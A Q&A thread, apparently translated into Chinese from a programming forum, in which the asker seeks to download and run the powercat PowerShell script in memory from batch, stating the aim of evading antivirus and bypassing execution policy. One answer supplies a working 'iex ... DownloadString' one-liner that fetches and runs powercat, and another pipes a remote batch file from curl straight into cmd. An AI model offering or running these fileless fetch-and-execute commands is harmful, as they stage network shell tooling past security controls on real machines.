通过纯批处理将远程文件下载到内存中

Question

在我的批处理脚本中，我正在尝试远程下载并执行一个 powershell 脚本。这是网址：

https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1

我想将文件下载到内存中（不接触磁盘），有几个原因：

1. 它绕过了 AV 检测
2. 它绕过了 Powershell 执行策略，因此不需要导致 AV 检测的 powershell -nop -ep bypass
3. 不会抛出不必要的语法错误
4. 您可以直接使用 .ps1 脚本中定义的函数

显然我可以使用certutil:

certutil -urlcache -split -f <url>

但我不希望文件进入磁盘，这会导致 AV 检测。
使用其他语言（例如 PowerShell）也可以轻松完成同样的事情：

(New-Object Net.WebClient).DownloadString($url)

或

(New-Object IO.StreamReader([Net.HttpWebRequest]::Create($url).GetResponse().GetResponseStream())).ReadToEnd()

我知道批处理不是执行此操作的最佳语言，但这可能吗？ （我想要纯批次）

Answer 1

我知道你想要纯批处理，但说真的，即使使用 powershell 的Restricted 执行策略，它也允许单独的命令。见https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_execution_policies?view=powershell-7

那么简单

powershell -command iex (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1')

Answer 2

无需临时文件即可下载并执行

curl -s https://example.com/test.bat | cmd /v:on /k

示例 test.bat

@echo off
(
cls

echo Hello
echo Time: !time!
exit
)

构建代码

正如Force batch file to load to RAM before running 中所说，您可以缓存单个命令块。

有一些限制：

• 它在 cmd（不是批处理）上下文中运行， 变量扩展有点不同。
• 标签不能使用

通过这种技术，您可以使用普通的batch macro style。

Answer 3

据我所知，没有。通过读取权限访问文件来批量读取文件。这意味着它不会使用正确的协议来访问 Web 服务器上的文件，除非允许通过 FTP 进行批量读取。